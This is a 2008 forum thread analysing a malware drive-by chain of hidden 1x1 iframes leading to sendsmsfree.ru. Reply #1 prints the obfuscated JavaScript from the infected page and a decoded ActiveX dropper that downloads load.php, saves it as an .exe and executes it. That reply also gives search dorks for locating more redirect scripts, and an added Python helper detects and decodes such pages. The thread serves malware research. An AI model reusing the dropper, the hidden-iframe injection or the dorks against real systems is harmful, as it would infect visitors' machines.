Author Topic: gost.freehostia.com  (Read 6801 times)


June 14, 2008, 01:33:10 pm

Orac

hxxp://gost.freehostia.com/gate/gate.php has got a link to an iframe,
<iframe src="hxxp://ruoo.info/2205/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

That link takes you to a second iframe,
<iframe src="hxxp://countermediagroup.com/ts/in.cgi?mymy" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

That link takes you to two more iframes,
<iframe src="hxxp://countermediagroup.com/ts/in.cgi?reyden" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://sendsmsfree.ru/f/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

From countermediagroup.com/ts/in.cgi,
Error: 'can't open redirects.log file'

From sendsmsfree.ru/f/index.php you get two cookies, no code on the page at all,
SL_mymy_0000=_10000_
TSUSER=mymy

Comment, you can only visit gost.freehostia.com/gate/gate.php once, after that you just get a blank page.
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment

June 14, 2008, 08:43:47 pm
Reply #1

JohnC


From countermediagroup.com/ts/in.cgi,
Error: 'can't open redirects.log file'

The in.cgi script, I believe, is Sutra TDS http://kytoon.com/sutra-tds.html, in itself a legitimate traffic direction script; however, it is often used for malicious purposes to direct users to exploits or rogue sites etc.

You can see there are quite a lot of those sites listed:
http://www.malwaredomainlist.com/mdl.php?search=in.cgi

"Error: 'can't open redirects.log file'" is one way of finding more of these sites. You normally get this error message if you don't supply the right parameter (in.cgi?parameter). It is normally a number, and experimenting with different numbers can lead to different sites.

The script will only work with the exact domain, so if it is set for domain.com www.domain.com will give an error, and vice versa. This is the error you get:
"Error: 'Please use parameters provided with your package (ih=*)'"

And other ways to find this script of course:
inurl:"in.cgi?default"
Different search engines may give different results.

Browsing to the parent directory will sometimes take you to the login page:
"user enter" "bos enter"

From sendsmsfree.ru/f/index.php you get two cookies, no code on the page at all,
SL_mymy_0000=_10000_
TSUSER=mymy

Comment, you can only visit gost.freehostia.com/gate/gate.php once, after that you just get a blank page.

When you visit that page you get:

<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qnfo`mh)(: gtobuhno!qnfo`mh)(!z w`s!vldoeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(: vldoeds/rdu@uushctud)&he&-&vldoeds&(: vldoeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(: usx!z w`s!ppppp!<!vldoeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(: w`s!vvvvv!<!vldoeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(: w`s!ddddd!<!vldoeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(: usx!z!ddddd/uxqd!<!0: ppppp/nqdo)&F&*#D#*&U&-&iuuq;..rdoerlrgsdd/st.g.mn`e/qiq&-g`mrd(: ppppp/rdoe)(:!ddddd/nqdo)(: ddddd/Vshud)ppppp/sdrqnordCnex(: w`s!hlx`!<!&/..//..rbinrru/dyd&: ddddd/R`wdUnGhmd)hlx`-3(: ddddd/Bmnrd)(: |!b`ubi)d(!z| usx!z!vvvvv/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z|| b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Decoded with Malzilla:

pognali();

// Decoded dropper: fetches load.php with MSXML2.XMLHTTP, writes the body to
// disk with ADODB.Stream, then launches it through Shell.Application.
function pognali() {
  var wmender = document.createElement('object');
  wmender.setAttribute('id','wmender');
  wmender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
  try {
    var qqqqq = wmender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
    var wwwww = wmender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
    var eeeee = wmender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
    try {
      eeeee.type = 1;
      qqqqq.open('G'+"E"+'T','http://sendsmsfree.ru/f/load.php',false);
      qqqqq.send(); eeeee.open();
      eeeee.Write(qqqqq.responseBody);
      var imya = './/..//schosst.exe';
      eeeee.SaveToFile(imya,2);
      eeeee.Close();
    } catch(e) {}
    try { wwwww.shellexecute(imya); } catch(e) {}
  } catch(e){}
}
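Added example, not code from this thread or from Malzilla: a small Python triage helper that flags hidden 1x1 iframes like the ones Orac lists and recovers the eval()'d source of a `String.fromCharCode(charCodeAt(i) ^ K)` script like the one above, generalising the key beyond 1 and re-joining the split `'a'+"b"` string literals so the COM names read whole. The iframe URL is a constructed placeholder and the payload is only the first ten characters of the real obfuscated string (which decode to `pognali();`).

```python
import re

# Constructed sample page: one hidden 1x1 iframe (placeholder URL) plus the
# XOR-1 eval() wrapper seen in the thread, carrying only the first ten
# characters of the real payload ("qnfo`mh)(:" decodes to "pognali();").
SAMPLE_HTML = '''<html><body>
<iframe src="http://example.invalid/x.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<script language=JavaScript>str = "qnfo`mh)(:";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script>
</body></html>'''

# Captures the obfuscated string literal and the XOR key K from the wrapper.
XOR_SCRIPT = re.compile(r'str\s*=\s*"([^"]*)".*?charCodeAt\s*\(\s*i\s*\)\s*\^\s*(\d+)', re.S)
# COM/ActiveX names the decoded dropper in this thread relies on.
INDICATORS = ("ADODB.Stream", "Shell.Application", "SaveToFile",
              "shellexecute", "CreateObject", "responseBody")

def hidden_iframes(html):
    """Return src URLs of iframes that are 1x1 or styled visibility:hidden."""
    found = []
    for m in re.finditer(r'<iframe\b[^>]*>', html, re.I):
        tag = m.group(0)
        src = re.search(r'src=["\']?([^"\'\s>]+)', tag, re.I)
        tiny = (re.search(r'width=["\']?1\b', tag, re.I)
                and re.search(r'height=["\']?1\b', tag, re.I))
        hidden = re.search(r'visibility\s*:\s*hidden', tag, re.I)
        if src and (tiny or hidden):
            found.append(src.group(1))
    return found

def unsplit_strings(js):
    """Join 'a'+"b" literal concatenations so split API names read whole."""
    pat = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
    prev = None
    while prev != js:  # repeat until no adjacent literal pair is left
        prev, js = js, pat.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", js)
    return js

def decode_xor_script(html):
    """Recover the source each 'charCodeAt(i) ^ K' block hands to eval()."""
    decoded = []
    for payload, key in XOR_SCRIPT.findall(html):
        plain = "".join(chr(ord(c) ^ int(key)) for c in payload)
        decoded.append(unsplit_strings(plain))
    return decoded

def indicators(js):
    """INDICATORS names present in decoded JS, matched case-insensitively."""
    return [n for n in INDICATORS if n.lower() in js.lower()]
```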

June 15, 2008, 12:05:26 pm
Reply #2

Orac

Interesting, I think sendsmsfree.ru/f/index.php must be user-agent sensitive; yesterday I got nothing but the cookies, today I got
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /f/index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2 Server at sendsmsfree.ru Port 80</address>
</body></html>

Which is totally different to the 404 JohnC grabbed from the link.
